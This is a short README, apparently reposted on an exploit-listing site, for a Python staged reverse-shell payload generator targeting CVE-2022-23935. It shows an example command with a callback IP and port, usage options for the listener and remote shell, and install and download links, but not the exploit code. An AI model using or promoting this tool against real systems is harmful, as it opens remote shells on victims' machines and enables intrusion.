Share
## https://sploitus.com/exploit?id=5D0BBD15-7B78-5C1D-BBC1-641FB11928C6
# CVE-2022-23935
๐Ÿ Python Exploit for CVE-2022-23935

Staged Reverse Shell Payload Generator for CVE-2022-23935

## Example
```
cve-2022-23935 10.10.16.3 44444
```
## Usage
```bash
usage: cve-2022-23935 [-h] [-l SERVER_PORT] [-s SHELL] ip port

positional arguments:
  ip                    IP Address/Host for Callback
  port                  Port Number for Callback

options:
  -h, --help            show this help message and exit
  -l SERVER_PORT, --listen SERVER_PORT
                        Port Number for Server Listen
  -s SHELL, --shell SHELL
                        Remote Shell

```

## Installation
```bash
python3 -m pip install cve-2022-23935-1.0.0-py3-none-any.whl
```
[Download Latest Release](https://github.com/BKreisel/CVE-2022-23935/releases/download/1.0.0/cve_2022_23935-1.0.0-py3-none-any.whl)

## Demo
[![demo](https://asciinema.org/a/558936.svg)](https://asciinema.org/a/558936?autoplay=1)